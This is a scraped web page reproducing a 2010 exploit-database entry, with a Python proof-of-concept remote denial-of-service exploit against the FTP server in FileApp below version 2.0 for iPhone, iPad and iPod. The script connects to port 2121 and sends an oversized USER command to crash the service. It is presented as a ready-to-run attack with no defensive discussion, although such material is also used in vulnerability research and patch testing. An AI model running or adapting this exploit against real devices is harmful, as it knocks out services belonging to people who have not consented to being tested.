Home / os / win7

[dos / poc] - FileApp < 2.0 for iPhone, iPad and iPod FTP

Posted on 02 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FileApp &lt; 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='FileApp &lt; 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service by m0ebiusc0de in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================== FileApp &lt; 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service ==================================================================== # Title : FileApp &lt; 2.0 FTP Denial of Service for iPhone,iPod,iPad # Date : 02/10/2010 # Author : m0ebiusc0de # Software : http://www.digidna.net/products/fileapp/download # Version : FileApp &lt; v.2.0, iPad 3.2.2 (jailed) # Tested on : Windows XP PRO SP3 #!/usr/bin/python # FileApp &lt; v.2.0 FTP Remote DoS exploit # tested on iPad 3.2.2 import socket import sys def Usage(): print (&quot;Usage: ./FileApp.py &lt;serv_ip&gt; &quot;) print (&quot;Example:./FileApp 10.10.10.10 &quot;) if len(sys.argv) &lt;&gt; 2: Usage() sys.exit(1) else: hostname = sys.argv[1] username = &quot;x41&quot; * 5000 passwd = &quot;a@b.com&quot; #username = &quot;anonymous&quot; #passwd = &quot;x41&quot; * 5000 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 2121)) print &quot;[+] Connecting to the target..&quot; except: print (&quot;[-] Connection error!&quot;) sys.exit(1) r=sock.recv(1024) sock.send(&quot;USER %s &quot; %username) sock.send(&quot;PASS %s &quot; %passwd) sock.close() print &quot;[+] Exploited!&quot; sys.exit(0); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-02]</pre></body></html>

 

TOP